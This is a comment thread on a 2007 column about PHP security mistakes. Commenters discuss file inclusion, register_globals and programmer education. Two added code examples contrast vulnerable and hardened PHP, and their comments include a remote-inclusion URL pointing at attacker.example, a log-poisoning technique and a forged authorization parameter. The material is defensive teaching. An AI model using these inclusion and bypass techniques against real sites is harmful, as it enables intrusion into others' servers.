Kelly Martin, 2007-01-08
PHP has become the most popular application language on the web, but common security mistakes by developers are giving PHP a bad name. Here's how PHP coding errors have become the new low-hanging fruit for attackers, contributing to the phishing problems on the web.
PHP apps: Security's Low-Hanging Fruit
2007-01-09
ninjah (1 reply)
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-11
rdivilbiss
A simple glance at BugTraq will show that the security vulnerabilities are not affecting little Johnny's first web apps, but are littered among the largest, most widely installed PHP applications. So as you say... let us look at what products these vulns are found in.
Putting your head in the sand is i...
PHP apps: Security's Low-Hanging Fruit
2007-01-09
Anonymous
Set allow_url_fopen=Off to disable remote file inclusions, but local file inclusions, especially of web log files, will also lead to offensive code execution, as I am sure you are perfectly aware.
The real problem with PHP is its simplicity. Anyone *without any software writing skills whatsoev...
PHP apps: Security's Low-Hanging Fruit
2007-01-09
Anonymous (2 replies)
Placing blame on the PHP makers is like blaming the handgun manufacturers or the tool makers if someone hurts themselves or someone else with that gun or tool. That's just lame. Perhaps we'd all be better served by enhanced, available, low-cost programmer education. Place the responsibility where...
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-10
Anonymous
Rewording this:
"Placing blame on Microsoft is like blaming the handgun manufacturers or the tool makers if someone hurts themselves or someone else with that gun or tool. That's just lame."
When all those users work with administrative privileges, download all kinds of creepy software, brow...
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-11
Josef Meixner
Then why do 'include' and 'require' even take URIs? Can you think of any valid use which is not a security hole? So why not take it out, the apps which break are probably insecure in any case.
If that ability is really needed, then why not add 'remote_include' and 'remote_require'. That way the p...
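The two comments above on file inclusion (the allow_url_fopen remark and Josef Meixner's question about why include and require take URIs at all) describe the same code pattern. The following is an added example, not code from the column or from any commenter: a page-dispatch include written the vulnerable way, beside an allowlist version that never lets request data touch a path, with the php.ini settings involved in comments. The function names, the PAGES table and the pages/ directory are assumptions made for this illustration.

```php
<?php
// Added example, not code from the column or from any commenter.
// A "page dispatcher" written the vulnerable way, beside a hardened version.
// Names (render_page_vulnerable, resolve_page, render_page, PAGES, pages/)
// are assumptions made for this illustration.

// VULNERABLE: the request parameter becomes the whole include path.
//   ?page=http://attacker.example/shell.txt     -> remote file inclusion
//      (needs allow_url_fopen / allow_url_include on; the PHP 5.2+ switch
//       that governs include/require specifically is allow_url_include)
//   ?page=../../../var/log/apache2/access.log   -> local file inclusion
//      (unaffected by either setting; if the attacker first sent a request
//       whose User-Agent held a PHP open tag followed by code, that log
//       line now executes as PHP)
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request selects a key in a fixed table; nothing from the
// request is ever concatenated into a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page, string $base_dir): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;                     // unknown key: refuse, do not guess
    }
    $root = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . PAGES[$page]);
    // Defence in depth: even with an allowlist, confirm the resolved file
    // really sits under $base_dir (a mistaken table entry or a symlink
    // could otherwise point elsewhere).
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $page, string $base_dir): void
{
    $path = resolve_page($page, $base_dir);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// The php.ini side. allow_url_fopen=Off alone is not the whole story:
//   allow_url_fopen   = Off   ; remote URLs in fopen()/file_get_contents()
//   allow_url_include = Off   ; remote URLs in include/require (PHP >= 5.2)
//   open_basedir      = /var/www/site   ; cap on the local paths PHP may open
// None of these fix code that still passes user input to include().
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Usage: read the parameter explicitly from $_GET (never rely on
// register_globals having set $page for you).
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
render_page($page, __DIR__ . '/pages');
```

The allowlist is the actual fix; the realpath check and the ini settings only limit the damage when something else goes wrong. Note that open_basedir and allow_url_include do nothing against the log-file case once the request can name a path inside the permitted tree, which is why the hardened version refuses to build a path from the request at all.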
Don't forget basic file system security
2007-01-09
Void (1 reply)
Also please don't overlook basic file system security. This one is a bigger crime than coding in an unintentional vulnerability in my opinion. I just have to shake my head when I see these defacements happen that wouldn't have happened if they just applied basic/proper file system security. I have s...
Re: Don't forget basic file system security
2007-11-03
Catalin Hulea
Well... yes, the script user is supposed to be able to do INSERT, UPDATE, DELETE; how else is he supposed to post comments on a blog, for instance?...
Sorry, maybe I'm missing the point here... Maybe I am supposed to learn something, but how can you insert a comment on a post if you're not able t...
PHP apps: Security's Low-Hanging Fruit
2007-01-10
andyT
Many, if not most, PHP users are self-taught. What's missing in most of the PHP/MySQL/web books is security. Sure, there is a chapter on security, but precious little in the way of listings which include and discuss security. Hard to learn how to do it right when there are no examples.
Take this...
PHP apps: Security's Low-Hanging Fruit
2007-01-11
Anonymous (2 replies)
"It would be nice to have a global way for a script to ignore all variables in the URL"
register_globals was switched off by default years ago.....
Re: PHP apps: Security's Low-Hanging Fruit
2007-11-03
Catalin Hulea
Unfortunately there are a lot of hosting services that turn that setting ON again, because... let me give you this example: a web design company decides to start with PHP; in the beginning they don't know security and they produce 20 sites that are crap.
Later on, they learn not to make the same m...
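The exchange above (register_globals has been off by default since PHP 4.2, yet hosts keep switching it back on) is easier to follow with the mechanism in front of you. What follows is an added example, not code from the column or from any commenter: a login check that falls to a forged `authorized=1` parameter when the directive is on, the same check written so the setting cannot matter, and a runtime guard for hosts that re-enable it. The function names and the constructed request are assumptions made for this illustration; extract() is used to reproduce the register_globals effect on demand so the example behaves the same on a PHP release that no longer has the directive.

```php
<?php
// Added example, not code from the column or from any commenter.
// What register_globals does to a login check, and the same check written so
// that the setting cannot matter. login_page_vulnerable, login_page and
// register_globals_on are names chosen for this illustration.

// register_globals=On turns every request parameter into a variable before
// the script runs. extract() reproduces that effect on demand here, so the
// example behaves the same on a PHP that no longer has the directive.
function login_page_vulnerable(array $request, callable $check_password): bool
{
    extract($request);                    // <- the register_globals effect
    // $authorized was meant to be set only by the check below, but a request
    // carrying authorized=1 has already set it, and nothing here resets it.
    if (isset($user, $pass) && $check_password($user, $pass)) {
        $authorized = true;
    }
    return !empty($authorized);
}

// Hardened: read inputs from the request array explicitly and initialise every
// state variable yourself. Nothing an attacker adds to the URL is consulted.
function login_page(array $request, callable $check_password): bool
{
    $authorized = false;
    $user = isset($request['user']) ? (string) $request['user'] : '';
    $pass = isset($request['pass']) ? (string) $request['pass'] : '';
    if ($user !== '' && $check_password($user, $pass)) {
        $authorized = true;
    }
    return $authorized;
}

// Hosts that switch the directive back on can be caught at runtime. On PHP
// 5.4 and later the directive no longer exists and ini_get() returns false,
// which filter_var() maps to false as well.
function register_globals_on(): bool
{
    return filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN);
}

// Turning it off yourself where the host lets you:
//   php.ini    : register_globals = Off
//   .htaccess  : php_flag register_globals off      (mod_php only)
// ini_set('register_globals', ...) from the script does NOT work: the
// directive is per-directory and the variables exist before any script code runs.

// Demonstration on a constructed forged request: no valid password, just the flag.
$check = function (string $u, string $p): bool {
    return $u === 'alice' && $p === 'correct horse';
};
$forged = ['authorized' => '1', 'user' => 'mallory', 'pass' => 'wrong'];

if (register_globals_on()) {
    error_log('register_globals is on; refusing to run');
    exit(1);
}
var_dump(login_page_vulnerable($forged, $check));
var_dump(login_page($forged, $check));
```

With the forged request the vulnerable function reports the user as authorized and the hardened one does not. The difference is not the ini setting but the habit the hardened version shows: every variable is initialised before use and every input is read from the superglobal by name, so the code is correct whatever the host's php.ini says.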
PHP apps: Security's Low-Hanging Fruit
2007-01-11
Anonymous
Blah blah blah. You said it on the first page. Some very simple mistakes are made over and over again. Now get to the point. What are they and what should we be doing differently.
And by the way. Your security for not having bots post to your blog doesn't work with Firefox, and I have to refr...
Don't blame PHP, it's the newbies
2007-11-03
Catalin Hulea
Hello, I think this article is awesome. I am myself a PHP programmer and I always try to improve the security of my application; and I am also affected by some of my colleagues who don't have the same attitude.
However, I am totally against your presumption that PHP is a non-secure language; on ...
PHP apps: Security's Low-Hanging Fruit
2008-02-12
Anonymous
Hi, in defense of all newbies here, PHP is a great programme but obviously difficult to get your head around. As an internet newbie, just getting your head around HTML is mind-boggling enough.
Don't blame the newbies, give us sign posts as to how we can better use this programming language
Webmas...